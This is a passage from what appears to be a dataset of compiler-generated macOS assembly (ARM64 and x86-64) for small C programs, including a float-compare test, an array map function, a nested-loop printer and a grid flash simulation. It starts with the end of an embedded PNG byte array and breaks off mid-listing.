4\005\330\3346QS\232\266\032\213\312\365\262)\361\325\225\2605\270F\tu\346[\254\266\233\007\325n\203V7\376HJ\321dZ]S\207\274\207m\271\001\275=0\3054b\3474\334\244L/~\204Bo\253\223\222\362\313\270\353)\032\315p\2404y<\214\351\006{\246\341x\002;\3368\263\341\245\342.\316\026&i\017\334M\366\243\260\366\300\276\210\304\265\370\355\362\301\n\246\326\2066X\356fq;\263\374(A\342+\316\251\227\2332\302\365\357\324\352\177\336\2411\335\220b\360\345\030\013\373H\320 \030\035\332@\005\033,\243\377\235\205\004a\322U\nh\325\277a\r\226sc'\265,\300\204a\243y\233\300\tD\315\226\331f\374\251\330\222\263k\330\360\002\203\326-\345@^^\212\346$7\320'\225\240V\235Q\201\016\271h\253\241\323\007\347rf@\232\2033\t\370Y-\353\245Fs\fh\325\217J\215\313\256\021\n\352t\333G\264%\330\242\272[\035'\353\026\317i\232\312W|N\247\274/\200\316\363\372?\006\267\200\301\272\245\274\200\031\217A\227\241F_9JYj\362\235\023E\021Sf\243\331\003f\020\305\023\365\303@\363\245\344Y6{\033\260\032\337\262:\237\307!\271\023\343S\3050\353\026\262\b\023\371\324Y\233\364\207\331\212\217\017\2606\351\360vA\265\t\357\231\000B\343U\262(\307\362,A\324q\263R\220>A\214\307\034\331\326\375{[\274\313'\261\017Z\201\305\b\314\004lgm\322=gA\367\344m\322\177\036\300\210vj4\217m\322Km6\033\326\227\377_\035\n\004YW&\246\230\000\000\000\000IEND\256B`\202" .globl _mch2021_other_half_png_len ## @mch2021_other_half_png_len .p2align 3 _mch2021_other_half_png_len: .quad 39410 ## 0x99f2 .subsections_via_symbols
the_stack_data/190767785.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _test ; -- Begin function test .p2align 2 _test: ; @test .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] ldr w8, [sp, #12] add w8, w8, #1 scvtf s0, w8 str s0, [sp, #8] ldr s0, [sp, #8] ldr s1, [sp, #12] scvtf s1, s1 fcmp s0, s1 cset w8, eq and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-12] ; 4-byte Folded Spill stur wzr, [x29, #-4] bl _test stur w0, [x29, #-8] ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _test ## -- Begin function test .p2align 4, 0x90 _test: ## @test .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) movl -4(%rbp), %eax addl $1, %eax cvtsi2ss %eax, %xmm0 movss %xmm0, -8(%rbp) movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtsi2ssl -4(%rbp), %xmm1 ucomiss %xmm1, %xmm0 sete %al setnp %cl andb %cl, %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _test movl %eax, -8(%rbp) movl -8(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d\n" .subsections_via_symbols
the_stack_data/1156724.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _ft_map ; -- Begin function ft_map .p2align 2 _ft_map: ; @ft_map .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] str x2, [sp, #16] ldursw x9, [x29, #-20] mov x8, #4 mul x0, x8, x9 bl _malloc str x0, [sp] ldr x8, [sp] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ; kill: def $x8 killed $xzr stur xzr, [x29, #-8] b LBB0_6 LBB0_2: str wzr, [sp, #12] b LBB0_3 LBB0_3: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 ldr x8, [sp, #16] ldur x9, [x29, #-16] ldrsw x10, [sp, #12] ldr w0, [x9, x10, lsl #2] blr x8 ldr x8, [sp] ldrsw x9, [sp, #12] str w0, [x8, x9, lsl #2] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_3 LBB0_5: ldr x8, [sp] stur x8, [x29, #-8] b LBB0_6 LBB0_6: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _ft_map ## -- Begin function ft_map .p2align 4, 0x90 _ft_map: ## @ft_map .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq %rdx, -32(%rbp) movslq -20(%rbp), %rdi shlq $2, %rdi callq _malloc movq %rax, -48(%rbp) cmpq $0, -48(%rbp) jne LBB0_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB0_6 LBB0_2: movl $0, -36(%rbp) LBB0_3: ## =>This Inner Loop Header: Depth=1 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jge LBB0_5 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movq -32(%rbp), %rax movq -16(%rbp), %rcx movslq -36(%rbp), %rdx movl (%rcx,%rdx,4), %edi callq *%rax movl %eax, %edx movq -48(%rbp), %rax movslq -36(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_3 LBB0_5: movq -48(%rbp), %rax movq %rax, -8(%rbp) LBB0_6: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/891549.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ; -- Begin function f .p2align 2 _f: ; @f .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 ldr w8, [sp, #12] ldr w9, [sp, #8] add w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ## -- Begin function f .p2align 4, 0x90 _f: ## @f .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl -4(%rbp), %eax addl -8(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/165769268.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur wzr, [x29, #-20] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf stur wzr, [x29, #-16] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldur w8, [x29, #-16] ldur w9, [x29, #-8] mov w10, #5 sdiv w9, w9, w10 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_8 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 stur wzr, [x29, #-12] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-12] ldur w9, [x29, #-8] ldur w10, [x29, #-16] mov w11, #5 mul w10, w10, w11 subs w9, w9, w10 mov w10, #2 sdiv w9, w9, w10 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldur w8, [x29, #-20] add w13, w8, #1 stur w13, [x29, #-20] ldur w8, [x29, #-8] ldur w9, [x29, #-12] subs w8, w8, w9, lsl #1 ldur w9, [x29, #-16] mov w10, #5 mul w9, w9, w10 subs w12, w8, w9 ldur w8, [x29, #-12] ; implicit-def: $x10 mov x10, x8 ldur w9, [x29, #-16] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x11 mov x11, x13 str x11, [x9] ; implicit-def: $x11 mov x11, x12 str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB0_1 LBB0_8: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%03d%12d%12d%12d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $0, -20(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $0, -16(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movl -16(%rbp), %eax movl %eax, -24(%rbp) ## 4-byte Spill movl -8(%rbp), %eax movl $5, %ecx cltd idivl %ecx movl %eax, %ecx movl -24(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax jg LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -12(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -12(%rbp), %eax movl %eax, -28(%rbp) ## 4-byte Spill movl -8(%rbp), %eax imull $5, -16(%rbp), %ecx subl %ecx, %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movl -28(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax jg LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movl -20(%rbp), %esi addl $1, %esi movl %esi, -20(%rbp) movl -8(%rbp), %edx movl -12(%rbp), %eax shll $1, %eax subl %eax, %edx imull $5, -16(%rbp), %eax subl %eax, %edx movl -12(%rbp), %ecx movl -16(%rbp), %r8d leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_1 LBB0_8: xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%03d%12d%12d%12d\n" .subsections_via_symbols
the_stack_data/7951219.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _increase_neighbours ; -- Begin function increase_neighbours .p2align 2 _increase_neighbours: ; @increase_neighbours .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur w1, [x29, #-8] stur wzr, [x29, #-12] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #8 cset w8, ge tbnz w8, #0, LBB0_14 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-4] ldursw x10, [x29, #-12] adrp x9, _ni@PAGE add x9, x9, _ni@PAGEOFF ldr w9, [x9, x10, lsl #2] add w8, w8, w9 str w8, [sp, #16] ldur w8, [x29, #-8] ldursw x10, [x29, #-12] adrp x9, _nj@PAGE add x9, x9, _nj@PAGEOFF ldr w9, [x9, x10, lsl #2] add w8, w8, w9 str w8, [sp, #12] str wzr, [sp, #8] ldr w8, [sp, #16] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] adrp x9, _y@GOTPAGE ldr x9, [x9, _y@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 mov w8, #1 str w8, [sp, #8] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] adrp x9, _x@GOTPAGE ldr x9, [x9, _x@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 mov w8, #1 str w8, [sp, #8] b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_12 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 adrp x8, _m@GOTPAGE ldr x8, [x8, _m@GOTPAGEOFF] ldr x9, [x8] ldrsw x10, [sp, #16] ldr x9, [x9, x10, lsl #3] ldrsw x10, [sp, #12] add x10, x9, x10, lsl #2 ldr w9, [x10] add w9, w9, #1 str w9, [x10] ldr x8, [x8] ldrsw x9, [sp, #16] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 ldr w0, [sp, #16] ldr w1, [sp, #12] bl _increase_neighbours b LBB0_11 LBB0_11: ; in Loop: Header=BB0_1 Depth=1 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_1 Depth=1 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_1 LBB0_14: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _step ; -- Begin function step .p2align 2 _step: ; @step .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _m@GOTPAGE ldr x8, [x8, _m@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill adrp x9, _n_step@PAGE ldr w8, [x9, _n_step@PAGEOFF] add w8, w8, #1 str w8, [x9, _n_step@PAGEOFF] stur wzr, [x29, #-4] stur wzr, [x29, #-8] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldur w8, [x29, #-8] adrp x9, _y@GOTPAGE ldr x9, [x9, _y@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_10 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 stur wzr, [x29, #-12] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-12] adrp x9, _x@GOTPAGE ldr x9, [x9, _x@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_8 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [x8] ldursw x10, [x29, #-8] ldr x9, [x9, x10, lsl #3] ldursw x10, [x29, #-12] add x10, x9, x10, lsl #2 ldr w9, [x10] add w9, w9, #1 str w9, [x10] ldr x8, [x8] ldursw x9, [x29, #-8] ldr x8, [x8, x9, lsl #3] ldursw x9, [x29, #-12] ldr w8, [x8, x9, lsl #2] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldur w0, [x29, #-8] ldur w1, [x29, #-12] bl _increase_neighbours b LBB1_6 LBB1_6: ; in Loop: Header=BB1_3 Depth=2 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_3 Depth=2 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_3 LBB1_8: ; in Loop: Header=BB1_1 Depth=1 b LBB1_9 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB1_1 LBB1_10: adrp x8, _n_step@PAGE ldr w9, [x8, _n_step@PAGEOFF] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf stur wzr, [x29, #-16] b LBB1_11 LBB1_11: ; =>This Loop Header: Depth=1 ; Child Loop BB1_13 Depth 2 ldur w8, [x29, #-16] adrp x9, _y@GOTPAGE ldr x9, [x9, _y@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_20 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=1 stur wzr, [x29, #-20] b LBB1_13 LBB1_13: ; Parent Loop BB1_11 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-20] adrp x9, _x@GOTPAGE ldr x9, [x9, _x@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_18 b LBB1_14 LBB1_14: ; in Loop: Header=BB1_13 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-16] ldr x8, [x8, x9, lsl #3] ldursw x9, [x29, #-20] ldr w8, [x8, x9, lsl #2] subs w8, w8, #9 cset w8, le tbnz w8, #0, LBB1_16 b LBB1_15 LBB1_15: ; in Loop: Header=BB1_13 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-16] ldr x9, [x8, x9, lsl #3] ldursw x10, [x29, #-20] mov w8, #0 str w8, [x9, x10, lsl #2] ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB1_16 LBB1_16: ; in Loop: Header=BB1_13 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-16] ldr x8, [x8, x9, lsl #3] ldursw x9, [x29, #-20] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB1_17 LBB1_17: ; in Loop: Header=BB1_13 Depth=2 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB1_13 LBB1_18: ; in Loop: Header=BB1_11 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB1_19 LBB1_19: ; in Loop: Header=BB1_11 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB1_11 LBB1_20: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _y@GOTPAGE ldr x8, [x8, _y@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill adrp x8, _x@GOTPAGE ldr x8, [x8, _x@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill adrp x8, _m@GOTPAGE ldr x8, [x8, _m@GOTPAGEOFF] str x8, [sp, #32] ; 8-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] ldur w8, [x29, #-8] subs w8, w8, #1 cset w8, gt and w8, w8, #0x1 stur w8, [x29, #-20] ldur w8, [x29, #-20] subs w8, w8, #0 cset w8, ne and w10, w8, #0x1 adrp x9, l_.str.4@PAGE add x9, x9, l_.str.4@PAGEOFF adrp x8, l_.str.3@PAGE add x8, x8, l_.str.3@PAGEOFF ands w10, w10, #0x1 csel x0, x8, x9, ne adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fopen stur x0, [x29, #-32] ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf mov w8, #1 stur w8, [x29, #-4] b LBB2_31 LBB2_2: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x9, [sp, #16] ; 8-byte Folded Reload str wzr, [x9] str wzr, [x8] stur wzr, [x29, #-36] b LBB2_3 LBB2_3: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-32] bl _fgetc sturb w0, [x29, #-37] ldursb w8, [x29, #-37] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB2_5 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=1 ldr x10, [sp, #16] ; 8-byte Folded Reload ldr w9, [x10] mov w8, #1 add w9, w9, #1 str w9, [x10] stur w8, [x29, #-36] b LBB2_3 LBB2_5: ; in Loop: Header=BB2_3 Depth=1 ldursb w8, [x29, #-37] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB2_7 b LBB2_6 LBB2_6: b LBB2_11 LBB2_7: ; in Loop: Header=BB2_3 Depth=1 b LBB2_8 LBB2_8: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-36] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: ; in Loop: Header=BB2_3 Depth=1 ldr x9, [sp, #24] ; 8-byte Folded Reload ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB2_10 LBB2_10: ; in Loop: Header=BB2_3 Depth=1 b LBB2_3 LBB2_11: ldur x0, [x29, #-32] bl _rewind ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x9, [sp, #16] ; 8-byte Folded Reload ldr w8, [x8] ldr w9, [x9] mul w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x0, x8, #2 bl _malloc ldr x8, [sp, #32] ; 8-byte Folded Reload str x0, [x8] stur wzr, [x29, #-44] b LBB2_12 LBB2_12: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldur w8, [x29, #-44] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_15 b LBB2_13 LBB2_13: ; in Loop: Header=BB2_12 Depth=1 ldr x8, [sp, #24] ; 8-byte Folded Reload ldrsw x8, [x8] lsl x0, x8, #2 bl _malloc ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-44] str x0, [x8, x9, lsl #3] b LBB2_14 LBB2_14: ; in Loop: Header=BB2_12 Depth=1 ldur w8, [x29, #-44] add w8, w8, #1 stur w8, [x29, #-44] b LBB2_12 LBB2_15: str wzr, [sp, #48] b LBB2_16 LBB2_16: ; =>This Loop Header: Depth=1 ; Child Loop BB2_18 Depth 2 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr w8, [sp, #48] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_23 b LBB2_17 LBB2_17: ; in Loop: Header=BB2_16 Depth=1 str wzr, [sp, #44] b LBB2_18 LBB2_18: ; Parent Loop BB2_16 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #24] ; 8-byte Folded Reload ldr w8, [sp, #44] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_21 b LBB2_19 LBB2_19: ; in Loop: Header=BB2_18 Depth=2 ldur x0, [x29, #-32] bl _fgetc ldr x9, [sp, #32] ; 8-byte Folded Reload subs w8, w0, #48 ldr x9, [x9] ldrsw x10, [sp, #48] ldr x9, [x9, x10, lsl #3] ldrsw x10, [sp, #44] str w8, [x9, x10, lsl #2] b LBB2_20 LBB2_20: ; in Loop: Header=BB2_18 Depth=2 ldr w8, [sp, #44] add w8, w8, #1 str w8, [sp, #44] b LBB2_18 LBB2_21: ; in Loop: Header=BB2_16 Depth=1 ldur x0, [x29, #-32] bl _fgetc b LBB2_22 LBB2_22: ; in Loop: Header=BB2_16 Depth=1 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB2_16 LBB2_23: b LBB2_24 LBB2_24: ; =>This Inner Loop Header: Depth=1 bl _step ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x9, [sp, #16] ; 8-byte Folded Reload ldr w8, [x8] ldr w9, [x9] mul w8, w8, w9 subs w8, w0, w8 cset w8, eq tbnz w8, #0, LBB2_26 b LBB2_25 LBB2_25: ; in Loop: Header=BB2_24 Depth=1 b LBB2_24 LBB2_26: adrp x8, _n_step@PAGE ldr w9, [x8, _n_step@PAGEOFF] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf str wzr, [sp, #40] b LBB2_27 LBB2_27: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr w8, [sp, #40] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_30 b LBB2_28 LBB2_28: ; in Loop: Header=BB2_27 Depth=1 ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x8, [x8] ldrsw x9, [sp, #40] ldr x0, [x8, x9, lsl #3] bl _free b LBB2_29 LBB2_29: ; in Loop: Header=BB2_27 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB2_27 LBB2_30: ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x0, [x8] bl _free stur wzr, [x29, #-4] b LBB2_31 LBB2_31: ldur w0, [x29, #-4] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _n_step ; @n_step .zerofill __DATA,__common,_n_step,4,2 .section __DATA,__data .globl _ni ; @ni .p2align 2 _ni: .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 0 ; 0x0 .long 0 ; 0x0 .long 1 ; 0x1 .long 1 ; 0x1 .long 1 ; 0x1 .globl _nj ; @nj .p2align 2 _nj: .long 4294967295 ; 0xffffffff .long 0 ; 0x0 .long 1 ; 0x1 .long 4294967295 ; 0xffffffff .long 1 ; 0x1 .long 4294967295 ; 0xffffffff .long 0 ; 0x0 .long 1 ; 0x1 .comm _y,4,2 ; @y .comm _x,4,2 ; 